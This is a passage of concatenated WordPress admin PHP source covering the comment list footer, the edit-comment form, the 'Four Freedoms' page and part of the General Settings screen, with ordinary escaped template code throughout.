<input type="hidden" name="paged" value="<?php echo esc_attr( absint( $_REQUEST['paged'] ) ); ?>" /> <?php } ?> <?php $wp_list_table->display(); ?> </form> </div> <div id="ajax-response"></div> <?php wp_comment_reply( '-1', true, 'detail' ); wp_comment_trashnotice(); require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> <?php /** * Edit comment form for inclusion in another file. * * @package WordPress * @subpackage Administration */ // Don't load directly. if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * @global WP_Comment $comment Global comment object. */ global $comment; ?> <form name="post" action="comment.php" method="post" id="post"> <?php wp_nonce_field( 'update-comment_' . $comment->comment_ID ); ?> <div class="wrap"> <h1><?php _e( 'Edit Comment' ); ?></h1> <div id="poststuff"> <input type="hidden" name="action" value="editedcomment" /> <input type="hidden" name="comment_ID" value="<?php echo esc_attr( $comment->comment_ID ); ?>" /> <input type="hidden" name="comment_post_ID" value="<?php echo esc_attr( $comment->comment_post_ID ); ?>" /> <div id="post-body" class="metabox-holder columns-2"> <div id="post-body-content" class="edit-form-section edit-comment-section"> <?php if ( 'approved' === wp_get_comment_status( $comment ) && $comment->comment_post_ID > 0 ) : $comment_link = get_comment_link( $comment ); ?> <div class="inside"> <div id="comment-link-box"> <strong><?php _ex( 'Permalink:', 'comment' ); ?></strong> <span id="sample-permalink"> <a href="<?php echo esc_url( $comment_link ); ?>"> <?php echo esc_html( $comment_link ); ?> </a> </span> </div> </div> <?php endif; ?> <div id="namediv" class="stuffbox"> <div class="inside"> <h2 class="edit-comment-author"><?php _e( 'Author' ); ?></h2> <fieldset> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Comment Author' ); ?> </legend> <table class="form-table editcomment" role="presentation"> <tbody> <tr> <td class="first"><label for="name"><?php _e( 'Name' ); ?></label></td> <td><input type="text" name="newcomment_author" size="30" value="<?php echo esc_attr( $comment->comment_author ); ?>" id="name" /></td> </tr> <tr> <td class="first"><label for="email"><?php _e( 'Email' ); ?></label></td> <td> <input type="text" name="newcomment_author_email" size="30" class="code" value="<?php echo esc_attr( $comment->comment_author_email ); ?>" id="email" /> </td> </tr> <tr> <td class="first"><label for="newcomment_author_url"><?php _e( 'URL' ); ?></label></td> <td> <input type="text" id="newcomment_author_url" name="newcomment_author_url" size="30" class="code" value="<?php echo esc_url( $comment->comment_author_url ); ?>" /> </td> </tr> </tbody> </table> </fieldset> </div> </div> <div id="postdiv" class="postarea"> <label for="content" class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Comment' ); ?> </label> <?php $quicktags_settings = array( 'buttons' => 'strong,em,link,block,del,ins,img,ul,ol,li,code,close' ); wp_editor( $comment->comment_content, 'content', array( 'media_buttons' => false, 'tinymce' => false, 'quicktags' => $quicktags_settings, ) ); wp_nonce_field( 'closedpostboxes', 'closedpostboxesnonce', false ); ?> </div> </div><!-- /post-body-content --> <div id="postbox-container-1" class="postbox-container"> <div id="submitdiv" class="stuffbox" > <h2><?php _e( 'Save' ); ?></h2> <div class="inside"> <div class="submitbox" id="submitcomment"> <div id="minor-publishing"> <div id="misc-publishing-actions"> <div class="misc-pub-section misc-pub-comment-status" id="comment-status"> <?php _e( 'Status:' ); ?> <span id="comment-status-display"> <?php switch ( $comment->comment_approved ) { case '1': _e( 'Approved' ); break; case '0': _e( 'Pending' ); break; case 'spam': _e( 'Spam' ); break; } ?> </span> <fieldset id="comment-status-radio"> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Comment status' ); ?> </legend> <label><input type="radio"<?php checked( $comment->comment_approved, '1' ); ?> name="comment_status" value="1" /><?php _ex( 'Approved', 'comment status' ); ?></label><br /> <label><input type="radio"<?php checked( $comment->comment_approved, '0' ); ?> name="comment_status" value="0" /><?php _ex( 'Pending', 'comment status' ); ?></label><br /> <label><input type="radio"<?php checked( $comment->comment_approved, 'spam' ); ?> name="comment_status" value="spam" /><?php _ex( 'Spam', 'comment status' ); ?></label> </fieldset> </div><!-- .misc-pub-section --> <div class="misc-pub-section curtime misc-pub-curtime"> <?php $submitted = sprintf( /* translators: 1: Comment date, 2: Comment time. */ __( '%1$s at %2$s' ), /* translators: Publish box date format, see https://www.php.net/manual/datetime.format.php */ date_i18n( _x( 'M j, Y', 'publish box date format' ), strtotime( $comment->comment_date ) ), /* translators: Publish box time format, see https://www.php.net/manual/datetime.format.php */ date_i18n( _x( 'H:i', 'publish box time format' ), strtotime( $comment->comment_date ) ) ); ?> <span id="timestamp"> <?php /* translators: %s: Comment date. */ printf( __( 'Submitted on: %s' ), '<b>' . $submitted . '</b>' ); ?> </span> <a href="#edit_timestamp" class="edit-timestamp hide-if-no-js"><span aria-hidden="true"><?php _e( 'Edit' ); ?></span> <span class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Edit date and time' ); ?> </span></a> <fieldset id='timestampdiv' class='hide-if-js'> <legend class="screen-reader-text"> <?php /* translators: Hidden accessibility text. */ _e( 'Date and time' ); ?> </legend> <?php /** * @global string $action */ global $action; touch_time( ( 'editcomment' === $action ), 0 ); ?> </fieldset> </div> <?php $post_id = $comment->comment_post_ID; if ( current_user_can( 'edit_post', $post_id ) ) { $post_link = "<a href='" . esc_url( get_edit_post_link( $post_id ) ) . "'>"; $post_link .= esc_html( get_the_title( $post_id ) ) . '</a>'; } else { $post_link = esc_html( get_the_title( $post_id ) ); } ?> <div class="misc-pub-section misc-pub-response-to"> <?php printf( /* translators: %s: Post link. */ __( 'In response to: %s' ), '<b>' . $post_link . '</b>' ); ?> </div> <?php if ( $comment->comment_parent ) : $parent = get_comment( $comment->comment_parent ); if ( $parent ) : $parent_link = esc_url( get_comment_link( $parent ) ); $name = get_comment_author( $parent ); ?> <div class="misc-pub-section misc-pub-reply-to"> <?php printf( /* translators: %s: Comment link. */ __( 'In reply to: %s' ), '<b><a href="' . $parent_link . '">' . $name . '</a></b>' ); ?> </div> <?php endif; endif; ?> <?php /** * Filters miscellaneous actions for the edit comment form sidebar. * * @since 4.3.0 * * @param string $html Output HTML to display miscellaneous action. * @param WP_Comment $comment Current comment object. */ echo apply_filters( 'edit_comment_misc_actions', '', $comment ); ?> </div> <!-- misc actions --> <div class="clear"></div> </div> <div id="major-publishing-actions"> <div id="delete-action"> <?php echo "<a class='submitdelete deletion' href='" . wp_nonce_url( 'comment.php?action=' . ( ! EMPTY_TRASH_DAYS ? 'deletecomment' : 'trashcomment' ) . "&c=$comment->comment_ID&_wp_original_http_referer=" . urlencode( wp_get_referer() ), 'delete-comment_' . $comment->comment_ID ) . "'>" . ( ! EMPTY_TRASH_DAYS ? __( 'Delete Permanently' ) : __( 'Move to Trash' ) ) . "</a>\n"; ?> </div> <div id="publishing-action"> <?php submit_button( __( 'Update' ), 'primary large', 'save', false ); ?> </div> <div class="clear"></div> </div> </div> </div> </div><!-- /submitdiv --> </div> <div id="postbox-container-2" class="postbox-container"> <?php /** This action is documented in wp-admin/includes/meta-boxes.php */ do_action( 'add_meta_boxes', 'comment', $comment ); /** * Fires when comment-specific meta boxes are added. * * @since 3.0.0 * * @param WP_Comment $comment Comment object. */ do_action( 'add_meta_boxes_comment', $comment ); do_meta_boxes( null, 'normal', $comment ); $referer = wp_get_referer(); ?> </div> <input type="hidden" name="c" value="<?php echo esc_attr( $comment->comment_ID ); ?>" /> <input type="hidden" name="p" value="<?php echo esc_attr( $comment->comment_post_ID ); ?>" /> <input name="referredby" type="hidden" id="referredby" value="<?php echo $referer ? esc_url( $referer ) : ''; ?>" /> <?php wp_original_referer_field( true, 'previous' ); ?> <input type="hidden" name="noredir" value="1" /> </div><!-- /post-body --> </div> </div> </form> <?php if ( ! wp_is_mobile() ) : ?> <script> try{document.post.name.focus();}catch(e){} </script> <?php endif; <?php /** * Your Rights administration panel. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; // This file was used to also display the Privacy tab on the About screen from 4.9.6 until 5.3.0. if ( isset( $_GET['privacy-notice'] ) ) { wp_redirect( admin_url( 'privacy.php' ), 301 ); exit; } // Used in the HTML title tag. $title = __( 'Freedoms' ); list( $display_version ) = explode( '-', get_bloginfo( 'version' ) ); $header_alt_text = sprintf( /* translators: %s: Version number. */ __( 'WordPress %s' ), $display_version ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap about__container"> <div class="about__header"> <div class="about__header-image"> <img src="<?php echo esc_url( admin_url( 'images/about-release-logo.svg?ver=7.0' ) ); ?>" alt="<?php echo esc_attr( $header_alt_text ); ?>" /> </div> <div class="about__header-title"> <h1> <?php _e( 'The Four Freedoms' ); ?> </h1> </div> <div class="about__header-text"> <?php _e( 'WordPress is free and open source software' ); ?> </div> </div> <nav class="about__header-navigation nav-tab-wrapper wp-clearfix" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>"> <a href="about.php" class="nav-tab"><?php _e( 'What’s New' ); ?></a> <a href="credits.php" class="nav-tab"><?php _e( 'Credits' ); ?></a> <a href="freedoms.php" class="nav-tab nav-tab-active" aria-current="page"><?php _e( 'Freedoms' ); ?></a> <a href="privacy.php" class="nav-tab"><?php _e( 'Privacy' ); ?></a> <a href="contribute.php" class="nav-tab"><?php _e( 'Get Involved' ); ?></a> </nav> <div class="about__section is-feature"> <p class="about-description"> <?php printf( /* translators: %s: https://wordpress.org/about/license/ */ __( 'WordPress comes with some awesome, worldview-changing rights courtesy of its <a href="%s">license</a>, the GPL.' ), __( 'https://wordpress.org/about/license/' ) ); ?> </p> </div> <div class="about__section has-2-columns"> <div class="column aligncenter"> <img class="freedom-image" src="<?php echo esc_url( admin_url( 'images/freedom-1.svg?ver=6.5' ) ); ?>" alt="" /> <h2 class="is-smaller-heading"><?php _e( 'The 1st Freedom' ); ?></h2> <p><?php _e( 'To run the program for any purpose.' ); ?></p> </div> <div class="column aligncenter"> <img class="freedom-image" src="<?php echo esc_url( admin_url( 'images/freedom-2.svg?ver=6.5' ) ); ?>" alt="" /> <h2 class="is-smaller-heading"><?php _e( 'The 2nd Freedom' ); ?></h2> <p><?php _e( 'To study how the program works and change it to make it do what you wish.' ); ?></p> </div> <div class="column aligncenter"> <img class="freedom-image" src="<?php echo esc_url( admin_url( 'images/freedom-3.svg?ver=6.5' ) ); ?>" alt="" /> <h2 class="is-smaller-heading"><?php _e( 'The 3rd Freedom' ); ?></h2> <p><?php _e( 'To redistribute.' ); ?></p> </div> <div class="column aligncenter"> <img class="freedom-image" src="<?php echo esc_url( admin_url( 'images/freedom-4.svg?ver=6.5' ) ); ?>" alt="" /> <h2 class="is-smaller-heading"><?php _e( 'The 4th Freedom' ); ?></h2> <p><?php _e( 'To distribute copies of your modified versions to others.' ); ?></p> </div> </div> <div class="about__section has-1-column"> <div class="column"> <p> <?php printf( /* translators: %s: https://wordpressfoundation.org/trademark-policy/ */ __( 'WordPress grows when people like you tell their friends about it, and the thousands of businesses and services that are built on and around WordPress share that fact with their users. The WordPress community is flattered every time someone spreads the good word, just make sure to <a href="%s">check out the WordPress Foundation trademark guidelines</a> first.' ), 'https://wordpressfoundation.org/trademark-policy/' ); ?> </p> <p> <?php $plugins_url = current_user_can( 'activate_plugins' ) ? admin_url( 'plugins.php' ) : __( 'https://wordpress.org/plugins/' ); $themes_url = current_user_can( 'switch_themes' ) ? admin_url( 'themes.php' ) : __( 'https://wordpress.org/themes/' ); printf( /* translators: 1: URL to Plugins screen, 2: URL to Themes screen, 3: https://wordpress.org/about/license/ */ __( 'Every plugin and theme in WordPress.org’s directory is 100%% GPL or a similarly free and compatible license, so you can feel safe finding <a href="%1$s">plugins</a> and <a href="%2$s">themes</a> there. If you get a plugin or theme from another source, make sure to <a href="%3$s">ask them if it’s GPL</a> first. If they do not respect the WordPress license, it is not recommended to use them.' ), $plugins_url, $themes_url, __( 'https://wordpress.org/about/license/' ) ); ?> </p> </div> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> <?php /** * General settings administration panel. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; /** WordPress Translation Installation API */ require_once ABSPATH . 'wp-admin/includes/translation-install.php'; if ( ! current_user_can( 'manage_options' ) ) { wp_die( __( 'Sorry, you are not allowed to manage options for this site.' ) ); } // Used in the HTML title tag. $title = __( 'General Settings' ); $parent_file = 'options-general.php'; /* translators: Date and time format for exact current time, mainly about timezones, see https://www.php.net/manual/datetime.format.php */ $timezone_format = _x( 'Y-m-d H:i:s', 'timezone date format' ); add_action( 'admin_head', 'options_general_add_js' ); $options_help = '<p>' . __( 'The fields on this screen determine some of the basics of your site setup.' ) . '</p>' . '<p>' . __( 'Most themes show the site title at the top of every page, in the title bar of the browser, and as the identifying name for syndicated feeds. Many themes also show the tagline.' ) . '</p>'; if ( ! is_multisite() ) { $options_help .= '<p>' . __( 'Two terms you will want to know are the WordPress URL and the site URL. The WordPress URL is where the core WordPress installation files are, and the site URL is the address a visitor uses in the browser to go to your site.' ) . '</p>' . '<p>' . sprintf( /* translators: %s: Documentation URL. */ __( 'Though the terms refer to two different concepts, in practice, they can be the same address or different. For example, you can have the core WordPress installation files in the root directory (<code>https://example.com</code>), in which case the two URLs would be the same. Or the <a href="%s">WordPress files can be in a subdirectory</a> (<code>https://example.com/wordpress</code>). In that case, the WordPress URL and the site URL would be different.' ), __( 'https://developer.wordpress.org/advanced-administration/server/wordpress-in-directory/' ) ) . '</p>' . '<p>' . sprintf( /* translators: 1: http://, 2: https:// */ __( 'Both WordPress URL and site URL can start with either %1$s or %2$s. A URL starting with %2$s requires an SSL certificate, so be sure that you have one before changing to %2$s. With %2$s, a padlock will appear next to the address in the browser address bar. Both %2$s and the padlock signal that your site meets some basic security requirements, which can build trust with your visitors and with search engines.' ), '<code>http://</code>', '<code>https://</code>' ) . '</p>' . '<p>' . __( 'If you want site visitors to be able to register themselves, check the membership box. If you want the site administrator to register every new user, leave the box unchecked. In either case, you can set a default user role for all new users.' ) . '</p>'; } $options_help .= '<p>' . __( 'You can set the language, and WordPress will automatically download and install the translation files (available if your filesystem is writable).' ) . '</p>' . '<p>' . __( 'UTC means Coordinated Universal Time.' ) . '</p>' . '<p>' . __( 'You must click the Save Changes button at the bottom of the screen for new settings to take effect.' ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => $options_help, ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/settings-general-screen/">Documentation on General Settings</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo esc_html( $title ); ?></h1> <form method="post" action="options.php" novalidate="novalidate"> <?php settings_fields( 'general' ); ?> <table class="form-table" role="presentation"> <tr> <th scope="row"><label for="blogname"><?php _e( 'Site Title' ); ?></label></th> <td><input name="blogname" type="text" id="blogname" value="<?php form_option( 'blogname' ); ?>" class="regular-text" /></td> </tr> <?php if ( ! is_multisite() ) { /* translators: Site tagline. */ $sample_tagline = __( 'Just another WordPress site' ); } else { /* translators: %s: Network title. */ $sample_tagline = sprintf( __( 'Just another %s site' ), get_network()->site_name ); } $tagline_description = sprintf( /* translators: %s: Site tagline example. */ __( 'In a few words, explain what this site is about. Example: “%s.”' ), $sample_tagline ); ?> <tr> <th scope="row"><label for="blogdescription"><?php _e( 'Tagline' ); ?></label></th> <td><input name="blogdescription" type="text" id="blogdescription" aria-describedby="tagline-description" value="<?php form_option( 'blogdescription' ); ?>" class="regular-text" /> <p class="description" id="tagline-description"><?php echo $tagline_description; ?></p></td> </tr> <?php if ( current_user_can( 'upload_files' ) ) : ?> <tr class="hide-if-no-js site-icon-section"> <th scope="row"><?php _e( 'Site Icon' ); ?></th> <td> <?php wp_enqueue_media(); wp_enqueue_script( 'site-icon' ); $classes_for_upload_button = 'upload-button button-hero button'; $classes_for_update_button = 'button'; $classes_for_wrapper = ''; if ( has_site_icon() ) { $classes_for_wrapper .= ' has-site-icon'; $classes_for_button = $classes_for_update_button; $classes_for_button_on_change = $classes_for_upload_button; } else { $classes_for_wrapper .= ' hidden'; $classes_for_button = $classes_for_upload_button; $classes_for_button_on_change = $classes_for_update_button; } // Handle alt text for site icon on page load. $site_icon_id = (int) get_option( 'site_icon' ); $app_icon_alt_value = ''; $browser_icon_alt_value = ''; $site_icon_url = get_site_icon_url(); if ( $site_icon_id ) { $img_alt = get_post_meta( $site_icon_id, '_wp_attachment_image_alt', true ); $filename = wp_basename( $site_icon_url ); $app_icon_alt_value = sprintf( /* translators: %s: The selected image filename. */ __( 'App icon preview: The current image has no alternative text. The file name is: %s' ), $filename ); $browser_icon_alt_value = sprintf( /* translators: %s: The selected image filename. */ __( 'Browser icon preview: The current image has no alternative text. The file name is: %s' ), $filename ); if ( $img_alt ) { $app_icon_alt_value = sprintf( /* translators: %s: The selected image alt text. */ __( 'App icon preview: Current image: %s' ), $img_alt ); $browser_icon_alt_value = sprintf( /* translators: %s: The selected image alt text. */ __( 'Browser icon preview: Current image: %s' ), $img_alt ); } } ?> <style> :root { --site-icon-url: url( '<?php echo esc_url( $site_icon_url ); ?>' ); } </style> <div id="site-icon-preview" class="site-icon-preview settings <?php echo esc_attr( $classes_for_wrapper ); ?>"> <div class="direction-wrap"> <img id="app-icon-preview" src="<?php echo esc_url( $site_icon_url ); ?>" class="app-icon-preview" alt="<?php echo esc_attr( $app_icon_alt_value ); ?>" /> <div class="site-icon-preview-browser"> <svg role="img" aria-hidden="true" fill="none" xmlns="http://www.w3.org/2000/svg" class="browser-buttons"><path fill-rule="evenodd" clip-rule="evenodd" d="M0 20a6 6 0 1 1 12 0 6 6 0 0 1-12 0Zm18 0a6 6 0 1 1 12 0 6 6 0 0 1-12 0Zm24-6a6 6 0 1 0 0 12 6 6 0 0 0 0-12Z" /></svg> <div class="site-icon-preview-tab"> <img id="browser-icon-preview" src="<?php echo esc_url( $site_icon_url ); ?>" class="browser-icon-preview" alt="<?php echo esc_attr( $browser_icon_alt_value ); ?>" /> <div class="site-icon-preview-site-title" id="site-icon-preview-site-title" aria-hidden="true"><?php bloginfo( 'name' ); ?></div> <svg role="img" aria-hidden="true" fill="none" xmlns="http://www.w3.org/2000/svg" class="close-button"> <path d="M12 13.0607L15.7123 16.773L16.773 15.7123L13.0607 12L16.773 8.28772L15.7123 7.22706L12 10.9394L8.28771 7.22705L7.22705 8.28771L10.9394 12L7.22706 15.7123L8.28772 16.773L12 13.0607Z" /> </svg> </div> </div> </div> </div> </div> <input type="hidden" name="site_icon" id="site_icon_hidden_field" value="<?php form_option( 'site_icon' ); ?>" /> <div class="site-icon-action-buttons"> <button type="button" id="choose-from-library-button" class="<?php echo esc_attr( $classes_for_button ); ?>" data-alt-classes="<?php echo esc_attr( $classes_for_button_on_change ); ?>" data-size="512" data-choose-text="<?php esc_attr_e( 'Choose a Site Icon' ); ?>" data-update-text="<?php esc_attr_e( 'Change Site Icon' ); ?>" data-update="<?php esc_attr_e( 'Set as Site Icon' ); ?>" data-state="<?php echo esc_attr( has_site_icon() ); ?>" > <?php if ( has_site_icon() ) : ?> <?php _e( 'Change Site Icon' ); ?> <?php else : ?> <?php _e( 'Choose a Site Icon' ); ?> <?php endif; ?> </button> <button id="js-remove-site-icon" type="button" <?php echo has_site_icon() ? 'class="button button-secondary reset remove-site-icon"' : 'class="button button-secondary reset remove-site-icon hidden"'; ?> > <?php _e( 'Remove Site Icon' ); ?> </button> </div> <p class="description"> <?php printf( /* translators: 1: pixel value for icon size. 2: pixel value for icon size. */ __( 'The Site Icon is what you see in browser tabs, bookmark bars, and within the WordPress mobile apps. It should be square and at least <code>%1$s by %2$s</code> pixels.' ), 512, 512 ); ?> </p> </td> </tr> <?php endif; /* End Site Icon */ if ( ! is_multisite() ) { $wp_site_url_class = ''; $wp_home_class = ''; if ( defined( 'WP_SITEURL' ) ) { $wp_site_url_class = ' disabled'; } if ( defined( 'WP_HOME' ) ) { $wp_home_class = ' disabled'; } ?> <tr> <th scope="row"><label for="siteurl"><?php _e( 'WordPress Address (URL)' ); ?></label></th> <td><input name="siteurl" type="url" id="siteurl" value="<?php form_option( 'siteurl' ); ?>"<?php disabled( defined( 'WP_SITEURL' ) ); ?> class="regular-text code<?php echo $wp_site_url_class; ?>" /></td> </tr> <tr> <th scope="row"><label for="home"><?php _e( 'Site Address (URL)' ); ?></label></th> <td><input name="home" type="url" id="home" aria-describedby="home-description" value="<?php form_option( 'home' ); ?>"<?php disabled( defined( 'WP_HOME' ) ); ?> class="regular-text code<?php echo $wp_home_class; ?>" /> <?php if ( ! defined( 'WP_HOME' ) ) : ?> <p class="description" id="home-description"> <?php printf( /* translators: %s: Documentation URL. */ __( 'Enter the same address here unless you <a href="%s">want your site home page to be different from your WordPress installation directory</a>.' ), __( 'https://developer.wordpress.org/advanced-administration/server/wordpress-in-directory/' ) ); ?> </p> <?php endif; ?> </td> </tr> <?php } ?> <tr> <th scope="row"><label for="new_admin_email"><?php _e( 'Administration Email Address' ); ?></label></th> <td><input name="new_admin_email" type="email" id="new_admin_email" aria-describedby="new-admin-email-description" value="<?php form_option( 'admin_email' ); ?>" class="regular-text ltr" /> <p class="description" id="new-admin-email-description"><?php _e( 'This address is used for admin purposes. If you change this, an email will be sent to your new address to confirm it. <strong>The new address will not become active until confirmed.</strong>' ); ?></p> <?php $new_admin_email = get_option( 'new_admin_email' ); if ( $new_admin_email && get_option( 'admin_email' ) !== $new_admin_email ) { $pending_admin_email_message = sprintf( /* translators: %s: New admin email. */ __( 'There is a pending change of the admin email to %s.' ), '<code>' . esc_html( $new_admin_email ) . '</code>' ); $pending_admin_email_message .= sprintf( ' <a href="%1$s">%2$s</a>', esc_url( wp_nonce_url( admin_url( 'options.php?dismiss=new_admin_email' ), 'dismiss-' . get_current_blog_id() . '-new_admin_email' ) ), __( 'Cancel' ) ); wp_admin_notice( $pending_admin_email_message, array( 'additional_classes' => array( 'updated', 'inline' ), ) ); } ?> </td> </tr> <?php if ( ! is_multisite() ) { $membership_title = __( 'Membership' ); ?> <tr> <th scope="row"><?php echo $membership_title; ?></th> <td><fieldset><legend class="screen-reader-text"><span><?php echo $membership_title; ?></span></legend><label for="users_can_register"> <input name="users_can_register" type="checkbox" id="users_can_register" value="1" <?php checked( '1', get_option( 'users_can_register' ) ); ?> /> <?php _e( 'Anyone can register' ); ?></label> </fieldset></td> </tr> <tr> <th scope="row"><label for="default_role"><?php _e( 'New User Default Role' ); ?></label></th> <td> <?php /** * Filters the roles to be excluded from the default_role option. * * @since 7.0.0 * * @param string[] $roles_to_exclude Array of roles to exclude from the dropdown. * Defaults to administrator and editor. */ $excluded_roles = (array) apply_filters( 'default_role_dropdown_excluded_roles', array( 'administrator', 'editor' ) ); $editable_roles = array_reverse( get_editable_roles() ); $selected = get_option( 'default_role' ); foreach ( $editable_roles as $role => $details ) { if ( in_array( $role, $excluded_roles, true ) && $role !== $selected ) { unset( $editable_roles[ $role ] ); } } ?> <select name="default_role" id="default_role"><?php wp_dropdown_roles( $selected, $editable_roles ); ?></select> </td> </tr> <?php } $languages = get_available_languages(); $translations = wp_get_available_translations(); if ( ! is_multisite() && defined( 'WPLANG' ) && '' !== WPLANG && 'en_US' !== WPLANG && ! in_array( WPLANG, $languages, true ) ) { $languages[] = WPLANG; } if ( ! empty( $languages ) || ! empty( $translations ) ) { ?> <tr> <th scope="row"><label for="WPLANG"><?php _e( 'Site Language' ); ?><span class="dashicons dashicons-translation" aria-hidden="true"></span></label></th> <td> <?php $locale = get_locale(); if ( ! in_array( $locale, $languages, true ) ) { $locale = ''; } wp_dropdown_languages( array( 'name' => 'WPLANG', 'id' => 'WPLANG', 'selected' => $locale, 'languages' => $languages, 'translations' => $translations, 'show_available_translations' => current_user_can( 'install_languages' ) && wp_can_install_language_pack(), ) ); // Add note about deprecated WPLANG constant. if ( defined( 'WPLANG' ) && ( '' !== WPLANG ) && WPLANG !== $locale ) { _deprecated_argument( 'define()', '4.0.0', /* translators: 1: WPLANG, 2: wp-config.php */ sprintf( __( 'The %1$s constant in your %2$s file is no longer needed.' ), 'WPLANG', 'wp-config.php' ) ); } ?> </td> </tr> <?php } ?> <tr> <?php $current_offset = get_option( 'gmt_offset' ); $tzstring = get_option( 'timezone_string' ); $check_zone_info = true; // Remove old Etc mappings. Fallback to gmt_offset. if ( str_contains( $tzstring, 'Etc/GMT' ) ) { $tzstring = ''; } if ( empty( $tzstring ) ) { // Create a UTC+- zone if no timezone string exists. $check_zone_info = false; if ( 0 === (int) $current_offset ) { $tzstring = 'UTC+0'; } elseif ( $current_offset < 0 ) { $tzstring = 'UTC' . $current_offset; } else { $tzstring = 'UTC+' . $current_offset; } } ?> <th scope="row"><label for="timezone_string"><?php _e( 'Timezone' ); ?></label></th> <td> <select id="timezone_string" name="timezone_string" aria-describedby="timezone-description"> <?php echo wp_timezone_choice( $tzstring, get_user_locale() ); ?> </select> <p class="description" id="timezone-description"> <?php printf( /* translators: %s: UTC abbreviation */ __( 'Choose either a city in the same timezone as you or a %s (Coordinated Universal Time) time offset.' ), '<abbr>UTC</abbr>' ); ?> </p> <p class="timezone-info"> <span id="utc-time"> <?php printf( /* translators: %s: UTC time. */ __( 'Universal time is %s.' ), '<code>' . date_i18n( $timezone_format, false, true ) . '</code>' ); ?> </span> <?php if ( get_option( 'timezone_string' ) || ! empty( $current_offset ) ) : ?> <span id="local-time"> <?php printf( /* translators: %s: Local time. */ __( 'Local time is %s.' ), '<code>' . date_i18n( $timezone_format ) . '</code>' ); ?> </span> <?php endif; ?> </p> <?php if ( $check_zone_info && $tzstring ) : ?> <p class="timezone-info"> <span> <?php $now = new DateTime( 'now', new DateTimeZone( $tzstring ) ); $dst = (bool) $now->format( 'I' ); if ( $dst ) { _e( 'This timezone is currently in daylight saving time.' ); } else { _e( 'This timezone is currently in standard time.' ); } ?> <br /> <?php if ( in_array( $tzstring, timezone_identifiers_list( DateTimeZone::ALL_WITH_BC ), true ) ) { $transitions = timezone_transitions_get( timezone_open( $tzstring ), time() ); // 0 index is the state at current time, 1 index is the next transition, if any. if ( ! empty( $transitions[1] ) ) { echo ' '; $message = $transitions[1]['isdst'] ? /* translators: %s: Date and time. */ __( 'Daylight saving time begins on: %s.' ) : /* translators: %s: Date and time. */ __( 'Standard time begins on: %s.' ); printf( $message, /* translators: Localized date and time format, see https://www.php.net/manual/datetime.format.php */ '<code>' . wp_date( __( 'F j, Y g:i a' ), $transitions[1]['ts'] ) . '</code>' ); } else { _e( 'This timezone does not observe daylight saving time.' ); } } ?> </span> </p> <?php endif; ?> </td> </tr> <?php $date_format_title = __( 'Date Format' ); ?> <tr> <th scope="row"><?php echo $date_format_title; ?></th> <td> <fieldset><legend class="screen-reader-text"><span><?php echo $date_format_title; ?></span></legend> <?php /** * Filters the default date formats. * * @since 2.7.0 * @since 4.0.0 Replaced the `Y/m/d` format with `Y-m-d` (ISO date standard YYYY-MM-DD). * @since 6.8.0 Added the `d.m.Y` format. * * @param string[] $default_date_formats Array of default date formats. */ $date_formats = array_unique( apply_filters( 'date_formats', array( __( 'F j, Y' ), 'Y-m-d', 'm/d/Y', 'd/m/Y', 'd.m.Y' ) ) ); $custom = true; foreach ( $date_formats as $format ) { echo "\t<label><input type='radio' name='date_format' value='" . esc_attr( $format ) . "'"; if ( get_option( 'date_format' ) === $format ) { // checked() uses "==" rather than "===". echo " checked='checked'"; $custom = false; } echo ' /> <span class="date-time-text format-i18n">' . date_i18n( $format ) . '</span><code>' . esc_html( $format ) . "</code></label><br />\n"; } echo '<label><input type="radio" name="date_format" id="date_format_custom_radio" value="\c\u\s\t\o\m"'; checked( $custom ); echo '/> <span class="date-time-text date-time-custom-text">' . __( 'Custom:' ) . '<span class="screen-reader-text"> ' . /* translators: Hidden accessibility text. */ __( 'enter a custom date format in the following field' ) . '</span></span></label>' . '<label for="date_format_custom" class="screen-reader-text">' . /* translators: Hidden accessibility text. */ __( 'Custom date format:' ) . '</label>' . '<input type="text" name="date_format_custom" id="date_format_custom" value="' . esc_attr( get_option( 'date_format' ) ) . '" class="small-text" />' . '<br />' . '<p><strong>' . __( 'Preview:' ) . '</strong> <span class="example">' . date_i18n( get_option( 'date_format' ) ) . '</span>' . "<span class='spinner'></span>\n" . '</p>'; ?> </fieldset> </td> </tr> <?php $time_format_title = __( 'Time Format' ); ?> <tr> <th scope="row"><?php echo $time_format_title; ?></th> <td> <fieldset><legend class="screen-reader-text"><span><?php echo $time_format_title; ?></span></legend> <?php /** * Filters the default time formats. * * @since 2.7.0 * * @param string[] $default_time_formats Array of default time formats. */ $time_formats = array_unique( apply_filters( 'time_formats', array( __( 'g:i a' ), 'g:i A', 'H:i' ) ) ); $custom = true; foreach ( $time_formats as $format ) { echo "\t<label><input type='radio' name='time_format' value='" . esc_attr( $format ) . "'"; if ( get_option( 'time_format' ) === $format ) { // checked() uses "==" rather than "===". echo " checked='checked'"; $custom = false; } echo ' /> <span class="date-time-text format-i18n">' . date_i18n( $format ) . '</span><code>' . esc_html( $format ) . "</code></label><br />\n"; } echo '<label><input type="radio" name="time_format" id="time_format_custom_radio" value="\c\u\s\t\o\m"'; checked( $custom ); echo '/> <span class="date-time-text date-time-custom-text">' . __( 'Custom:' ) . '<span class="screen-reader-text"> ' . /* translators: Hidden accessibility text. */ __( 'enter a custom time format in the following field' ) . '</span></span></label>' . '<label for="time_format_custom" class="screen-reader-text">' . /* translators: Hidden accessibility text. */ __( 'Custom time format:' ) . '</label>' . '<input type="text" name="time_format_custom" id="time_format_custom" value="' . esc_attr( get_option( 